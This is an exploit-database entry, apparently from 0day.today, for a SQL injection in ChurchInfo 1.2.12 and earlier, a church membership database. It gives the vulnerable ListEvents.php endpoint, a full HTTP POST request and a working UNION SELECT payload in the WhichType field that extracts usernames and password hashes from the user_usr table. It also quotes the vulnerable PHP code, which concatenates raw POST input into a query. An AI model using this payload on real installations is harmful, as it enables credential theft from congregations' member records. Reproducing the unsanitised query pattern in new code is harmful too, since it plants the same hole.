Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDun1337DAY-ID-15268
HistoryJan 02, 2011 - 12:00 a.m.

ChurchInfo <= 1.2.12 SQL Injection Vulnerability

2011-01-0200:00:00
dun
0day.today
16
JSON

Exploit for php platform in category web applications

##############################################################
#  [ ChurchInfo <= 1.2.12 ]  SQL Injection Vulnerability     #
##############################################################
#
# Script: "ChurchInfo is a free church database program to help churches track members,
#      families, groups, pledges and payments..."
#
# Script site: http://www.churchdb.org/
# Download: http://sourceforge.net/projects/churchinfo/
#
# [SQL] Vuln: http://site.com/churchinfo-1.2.12/ListEvents.php
#
#  POST /churchinfo-1.2.12/ListEvents.php HTTP/1.1
#  Host: site.com
#  User-Agent: Mozilla/5.0
#  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#  Accept-Language: pl,en-us;q=0.7,en;q=0.3
#  Accept-Encoding: gzip,deflate
#  Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
#  Keep-Alive: 115
#  Connection: keep-alive
#  Cookie: d4dad6935f632ac35975e3001dc7bbe8=49c5739b193271a0005a59b294a05da9; PHPSESSID=8aec7c6adbe96b4079c0150b3c54452a
#  Content-Type: application/x-www-form-urlencoded
#  Content-Length: 150
#  
#  WhichType=-1/**/UNION/**/SELECT/**/1,concat_ws(char(58),usr_per_ID,usr_UserName,usr_Password),3,4,5,6,7,8/**/from/**/user_usr/**/WHERE/**/usr_per_ID=1
#  
#  HTTP/1.1 200 OK
#  Date: Sat, 01 Jan 2011 15:39:10 GMT
#  Server: Apache
#  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
#  Expires: Thu, 19 Nov 1981 08:52:00 GMT
#  Pragma: no-cache
#  X-Powered-By: PHP/4.4.9
#  Keep-Alive: timeout=2, max=200
#  Connection: Keep-Alive
#  Transfer-Encoding: chunked
#  Content-Type: text/html
#   
#   
# Bug: ./churchinfo-1.2.12/ListEvents.php (lines: 29-48)
#
# ...
# require 'Include/Config.php';
# require 'Include/Functions.php';                             // (0) You should be logged in as some user
# $eType="All";
# $ThisYear=date("Y");
#
# if ($_POST['WhichType']){
#   $eType = $_POST['WhichType'];                              // (1)
# } else {
#   $eType ="All";
# }
#
# if($eType!="All"){
#   $sSQL = "SELECT * FROM event_types WHERE type_id=$eType";  // (2)
#   $rsOpps = RunQuery($sSQL);
#   $aRow = mysql_fetch_array($rsOpps, MYSQL_BOTH);
#   extract($aRow);
#   $sPageTitle = "Listing Events of Type = ".$type_name;      // (3)
# } else {
#   $sPageTitle = gettext("Listing All Church Events");
# }
# ... 
#
#
# Bug: ./churchinfo-1.2.12/Include/Header-function.php (line: 37)
#
# ... 
#    <title>ChurchInfo: <?php echo $sPageTitle; ?></title>     // (4)
# ... 
#
###############################################



#  0day.today [2018-01-05]  #
JSON